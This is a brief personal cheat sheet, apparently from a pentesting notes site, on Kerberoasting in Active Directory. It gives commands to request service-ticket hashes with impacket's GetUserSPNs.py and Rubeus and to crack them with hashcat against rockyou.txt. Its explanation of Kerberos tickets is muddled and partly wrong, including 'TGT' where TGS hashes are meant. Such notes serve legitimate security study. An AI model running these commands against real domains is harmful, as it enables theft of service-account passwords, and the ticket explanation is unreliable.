Page cover image

Kerberoasting

Basically Kerberos encripts TGTs which is just a ticket that the Domain Controller provides to the user, with the kerberos hash. The TGS is basically a longer hash afterwards. We present the TGS to be able to use other services without having to provide manual authentication. (NOT AD EXPERT DONT KILL ME :()

python3 GetUserSPNs.py <DOMAIN/username:password> -dc-ip <ip of domain controller > -request

Also try thats not in impacket.

Kerberoasting with Rubeus

Rubeus.exe kerberoast

Cracking TGTs

hashcat -m 13100 -a 0 kerberosast.txt rockyou.txt

Last updated